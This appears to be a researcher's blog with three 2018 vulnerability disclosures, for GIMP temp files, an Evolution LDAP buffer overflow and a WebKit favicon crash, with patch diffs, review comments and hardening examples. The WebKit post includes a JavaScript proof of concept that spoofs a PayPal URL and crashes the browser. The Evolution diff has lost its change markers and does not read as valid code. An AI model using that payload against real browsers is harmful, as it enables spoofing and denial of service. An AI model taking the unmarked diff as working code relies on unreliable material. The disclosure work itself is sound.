
Sunday, 24 June 2018

Insecure Permissions in GIMP - CVE-2018-12713

Hi Internet,

#ShortPost

Summary: GIMP through 2.10.2 makes g_get_tmp_dir calls to establish temporary filenames, which may result in a filename that already exists, as demonstrated by the gimp_write_and_read_file function in app/tests/test-xcf.c. This might be leveraged by attackers to overwrite files or read file content that was intended to be private.

While having a look at the GIMP code I observed that the file test-xcf.c, at #L314, contained:
filename = g_build_filename (g_get_tmp_dir (), "gimp-test.xcf", NULL);
g_get_tmp_dir () is backed by getenv("TMP"), so it returns untrusted input. This issue was reported to the GNOME GIMP team and a patch was pushed.

   GimpImage           *image;
   GimpImage           *loaded_image;
   GimpPlugInProcedure *proc;
-  gchar               *filename;
+  gchar               *filename = NULL;
+  gint                 file_handle;
   GFile               *file;
 
   /* Create the image */
@@ -311,7 +312,9 @@ gimp_write_and_read_file (Gimp     *gimp,
                          use_gimp_2_8_features);
 
   /* Write to file */
-  filename = g_build_filename (g_get_tmp_dir (), "gimp-test.xcf", NULL);
+  file_handle = g_file_open_tmp ("gimp-test-XXXXXX.xcf", &filename, NULL);
+  g_assert (file_handle != -1);
+  close (file_handle);
   file = g_file_new_for_path (filename);
   g_free (filename);
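Review bot: the only error handling is `g_assert (file_handle != -1)`; if the tests are built with G_DISABLE_ASSERT the check vanishes and execution continues into `close (file_handle)` with -1 and `g_file_new_for_path (filename)` with the NULL that `filename` was initialised to. Passing a `GError **` instead of the trailing `NULL` and failing through `g_assert_no_error` would keep the failure visible in every build. Also confirm the file includes `<unistd.h>` for `close ()`, which this hunk does not show. The template `"gimp-test-XXXXXX.xcf"` is fine here: unlike mkstemp(3), GLib does not require the XXXXXX run to be at the very end of the template.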
Not sure this is really solving the issue reported, which is that `g_get_tmp_dir()` uses environment variables (yet as g_file_open_tmp() uses g_get_tmp_dir()…). But at least g_file_open_tmp() should create unique temporary files, which prevents overriding existing files (which is most likely the only real attack possible here, or at least the only one I can think of unless some weird vulnerabilities exist in glib). CVE-2018-12713 was assigned to this issue.
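The hazard and the two standard remedies, as an added example in plain POSIX C rather than GIMP's or GLib's own code: a fixed name under the temp directory silently reuses whatever is already there, an O_EXCL open refuses it, and mkstemp() (the equivalent of what g_file_open_tmp() provides) picks a fresh name. The directory passed to demo() and the file names are assumptions made for the demo.

```c
/* Added example, not GIMP's code: why "<tmpdir>/fixed-name" is unsafe and
 * how an exclusive create or mkstemp() avoids it. POSIX only; the directory
 * handed to demo() and the file names are constructed for the demo. */
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Hardening 1: create-or-fail. O_EXCL makes open() return -1/EEXIST instead
 * of truncating whatever already sits at the path; O_NOFOLLOW additionally
 * refuses to go through a symlink planted there. */
static int open_new_exclusive(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Hardening 2, what the GIMP patch does via g_file_open_tmp(): let the OS
 * choose a unique name. On success *out_path is malloc'd; returns fd or -1. */
static int open_unique_tmp(const char *tmpdir, char **out_path)
{
    size_t n = strlen(tmpdir) + sizeof("/gimp-test-XXXXXX");
    char *tmpl = malloc(n);
    if (!tmpl) return -1;
    snprintf(tmpl, n, "%s/gimp-test-XXXXXX", tmpdir);
    int fd = mkstemp(tmpl);              /* O_CREAT|O_EXCL, mode 0600 */
    if (fd == -1) free(tmpl); else *out_path = tmpl;
    return fd;
}

/* Pre-create the predictable file (standing in for whatever a local user
 * left there), then check that both hardened variants behave as described.
 * Returns 1 when they do. */
static int demo(const char *tmpdir)
{
    char fixed[4096], *uniq = NULL;
    int fd, ok;
    /* the original pattern: tmpdir + constant name, predictable by anyone */
    snprintf(fixed, sizeof fixed, "%s/gimp-test.xcf", tmpdir);
    if ((fd = open(fixed, O_WRONLY | O_CREAT, 0600)) != -1) close(fd);
    errno = 0;
    ok = open_new_exclusive(fixed) == -1 && errno == EEXIST;
    unlink(fixed);
    fd = open_unique_tmp(tmpdir, &uniq);
    ok = ok && fd != -1 && strcmp(uniq, fixed) != 0;
    if (fd != -1) { close(fd); unlink(uniq); free(uniq); }
    return ok;
}
```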


Regards
Dhiraj

Friday, 15 June 2018

bufferoverflow() in evolution - CVE-2018-12422

Hi Internet,

#ShortPost

Evolution is a personal information management application that provides integrated mail, calendaring and address book functionality.

While going through the source code of GNOME Evolution we observed that:

`addressbook/backends/ldap/e-book-backend-ldap.c` in Evolution-Data-Server in GNOME Evolution through 3.29.2 might allow attackers to trigger a buffer overflow via a long query that is processed by the `strcat` function. CVE-2018-12422 was assigned to this issue.

We reported this to the GNOME Evolution team and a patch was pushed for it; the code is below for your reference.

		if (!strcmp (propname, "x-evolution-any-field")) {
			gint i;
			gint query_length;
			gchar *big_query;
			GString *big_query;
			gchar *match_str;
			if (one_star) {
				g_free (str);

			match_str = g_strdup_printf ("=*%s*)", str);

			query_length = 3; /* strlen ("(|") + strlen (")") */

			for (i = 0; i < G_N_ELEMENTS (prop_info); i++) {
				query_length += 1 /* strlen ("(") */ + strlen (prop_info[i].ldap_attr) + strlen (match_str);
			}

			big_query = g_malloc0 (query_length + 1);
			strcat (big_query, "(|");
			big_query = g_string_sized_new (G_N_ELEMENTS (prop_info) * 7);
			g_string_append (big_query, "(|");
			for (i = 0; i < G_N_ELEMENTS (prop_info); i++) {
				if ((prop_info[i].prop_type & PROP_TYPE_STRING) != 0 &&
				    !(prop_info[i].prop_type & PROP_WRITE_ONLY) &&
				     !(prop_info[i].prop_type & PROP_EVOLVE)) &&
				    (ldap_data->bl->priv->calEntrySupported ||
				     !(prop_info[i].prop_type & PROP_CALENTRY))) {
					strcat (big_query, "(");
					strcat (big_query, prop_info[i].ldap_attr);
					strcat (big_query, match_str);
					g_string_append (big_query, "(");
					g_string_append (big_query, prop_info[i].ldap_attr);
					g_string_append (big_query, match_str);
				}
			}
			strcat (big_query, ")");
			g_string_append (big_query, ")");

			ldap_data->list = g_list_prepend (ldap_data->list, big_query);
			ldap_data->list = g_list_prepend (ldap_data->list, g_string_free (big_query, FALSE));

			g_free (match_str);
		}
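Review bot: this rendering has lost the +/- markers, so removed lines (`gchar *big_query`, `g_malloc0`, the `strcat` calls, `g_list_prepend (ldap_data->list, big_query)`) sit interleaved with their replacements (`GString *big_query`, `g_string_sized_new`, `g_string_append`, `g_string_free (big_query, FALSE)`); compare against the linked commit before reading it as one listing. On the substance: `g_string_sized_new (G_N_ELEMENTS (prop_info) * 7)` is only an initial size hint and GString grows on every append, so correctness no longer depends on `query_length` matching the bytes actually written; if `gint query_length` and its computing loop survive in the new code they are dead and should go. The condition ending in `!(prop_info[i].prop_type & PROP_EVOLVE)) &&` has an unmatched `)`, apparently a dropped `evolutionPersonSupported ||` line as in the second block.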

		if (!strcmp (propname, "x-evolution-any-field")) {
			gint i;
			gint query_length;
			gchar *big_query;
			GString *big_query;
			gchar *match_str;

			match_str = g_strdup ("=*)");

			query_length = 3; /* strlen ("(|") + strlen (")") */

			for (i = 0; i < G_N_ELEMENTS (prop_info); i++) {
				query_length += 1 /* strlen ("(") */ + strlen (prop_info[i].ldap_attr) + strlen (match_str);
			}

			big_query = g_malloc0 (query_length + 1);
			strcat (big_query, "(|");
			big_query = g_string_sized_new (G_N_ELEMENTS (prop_info) * 7);
			g_string_append (big_query, "(|");
			for (i = 0; i < G_N_ELEMENTS (prop_info); i++) {
				if (!(prop_info[i].prop_type & PROP_WRITE_ONLY) &&
				    (ldap_data->bl->priv->evolutionPersonSupported ||
				     !(prop_info[i].prop_type & PROP_EVOLVE)) &&
				    (ldap_data->bl->priv->calEntrySupported ||
				     !(prop_info[i].prop_type & PROP_CALENTRY))) {
					strcat (big_query, "(");
					strcat (big_query, prop_info[i].ldap_attr);
					strcat (big_query, match_str);
					g_string_append (big_query, "(");
					g_string_append (big_query, prop_info[i].ldap_attr);
					g_string_append (big_query, match_str);
				}
			}
			strcat (big_query, ")");
			g_string_append (big_query, ")");

			ldap_data->list = g_list_prepend (ldap_data->list, big_query);
			ldap_data->list = g_list_prepend (ldap_data->list, g_string_free (big_query, FALSE));

			g_free (match_str);
		}
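Review bot: in this branch `match_str` is the constant `"=*)"`, so the query length is bounded by the static `prop_info` table and the GString conversion is for consistency with the first branch rather than an overflow fix in its own right. As above, `g_string_free (big_query, FALSE)` hands the buffer to the list and the adjacent `g_list_prepend (ldap_data->list, big_query)` is the pre-fix line that the rendering no longer marks as removed.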

Source: https://gitlab.gnome.org/GNOME/evolution-data-server/commit/34bad61738e2127736947ac50e0c7969cc944972?view=inline
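The same conversion the patch makes, as an added example that is not Evolution's code: the pre-fix length arithmetic next to a small growable buffer in the spirit of GString, so the filter can never outgrow its destination. The prop_info stand-in table and attribute names are constructed for the demo.

```c
/* Added example, not Evolution's code: build the "x-evolution-any-field"
 * LDAP filter with a growable buffer instead of strcat() into a buffer
 * sized by hand. The attribute table below is constructed for the demo. */
#include <stdlib.h>
#include <string.h>

static const char *const ldap_attrs[] = { "cn", "mail", "sn", "telephoneNumber" };
#define N_ATTRS (sizeof ldap_attrs / sizeof ldap_attrs[0])

/* Minimal GString-like buffer: grow first, then copy, so an append can never
 * write past the allocation. Returns 0 only on allocation failure. */
typedef struct { char *buf; size_t len, cap; } strbuf;
static int sb_append(strbuf *sb, const char *s)
{
    size_t n = strlen(s), need = sb->len + n + 1;
    if (need > sb->cap) {
        size_t ncap = sb->cap ? sb->cap : 64;
        while (ncap < need) ncap *= 2;
        char *nb = realloc(sb->buf, ncap);
        if (!nb) return 0;
        sb->buf = nb; sb->cap = ncap;
    }
    memcpy(sb->buf + sb->len, s, n + 1);
    sb->len += n;
    return 1;
}

/* The pre-fix byte count: "(|" + ")" plus "(" + attr + "=*" + str + "*)" per
 * attribute. It grows with the client-controlled str, so no fixed-size
 * strcat() destination can be right for every input. */
static size_t required_query_len(const char *str)
{
    size_t len = 3, match_len = strlen(str) + 4;
    for (size_t i = 0; i < N_ATTRS; i++)
        len += 1 + strlen(ldap_attrs[i]) + match_len;
    return len;
}

/* Returns a malloc'd "(|(cn=*str*)(mail=*str*)...)" filter, or NULL on OOM.
 * Each piece is appended separately; nothing is ever measured by hand. */
static char *build_any_field_query(const char *str)
{
    strbuf sb = { NULL, 0, 0 };
    int ok = sb_append(&sb, "(|");
    for (size_t i = 0; ok && i < N_ATTRS; i++)
        ok = sb_append(&sb, "(") && sb_append(&sb, ldap_attrs[i]) &&
             sb_append(&sb, "=*") && sb_append(&sb, str) && sb_append(&sb, "*)");
    ok = ok && sb_append(&sb, ")");
    if (!ok) { free(sb.buf); return NULL; }
    return sb.buf;
}
```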

Mentions:
A shoutout to Zubin and Hardik; we work together to find security bugs. Hope you like the read.


Regards
Dhiraj

Friday, 1 June 2018

WebKit crashes when pageURL is unset - CVE-2018-11646

Hi Internet,

This bug is a continuation of CVE-2018-11396 - BFuzz.

Summary:
webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as distributed in Safari Technology Preview Release 57, mishandles an unset pageURL, leading to an application crash.

PoC:
win = window.open("sleep_one_second.php", "WIN");
window.open("https://www.paypal.com", "WIN");
win.document.execCommand('Stop');
win.document.write("Spoofed URL");
win.document.close();
Even after the patch for CVE-2018-11396 in the Epiphany web browser, the browser still crashed with the JS PoC above. Unfortunately the gdb crash made it impossible to get a full trace, so it was hard to know for sure whether this was an Epiphany bug or a WebKit bug, and the Epiphany team started investigating.

Below is the backtrace using Fedora 27.
#0 WTF::StringImpl::rawHash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 508
#1 WTF::StringImpl::hasHash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 514
#2 WTF::StringImpl::hash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 525
#3 WTF::StringHash::hash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringHash.h line 73
#9 WTF::HashMap, WTF::HashTraits >::get
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/HashMap.h line 406
#10 webkitFaviconDatabaseSetIconURLForPageURL
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 193
#11 webkitFaviconDatabaseSetIconForPageURL
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 318
#12 webkitWebViewSetIcon
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitWebView.cpp line 1964
#13 WTF::Function::performCallbackWithReturnValue
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/GenericCallback.h line 108
#15 WebKit::WebPageProxy::dataCallback
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 5083
#16 WebKit::WebPageProxy::finishedLoadingIcon
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 6848
#17 IPC::callMemberFunctionImpl::operator()
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 68
#29 WTF::RunLoop::::_FUN(gpointer)
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 70
#30 g_main_dispatch
at gmain.c line 3148
#31 g_main_context_dispatch
at gmain.c line 3813
#32 g_main_context_iterate
at gmain.c line 3886
#33 g_main_context_iteration
at gmain.c line 3947
#34 g_application_run
at gapplication.c line 2401
#35 main
at ../src/ephy-main.c line 432 
Two similar reproducers triggered two different crashes. We concluded that this crash is from WebKit (crash in WebKitFaviconDatabase when pageURL is unset); a bug was filed for it, and CVE-2018-11646 was assigned to this issue.

Mentions:
A shoutout to Zubin and Hardik (Teamw00t); we work together to find security bugs. Hope you like the read.


Regards
Dhiraj (Teamw00t)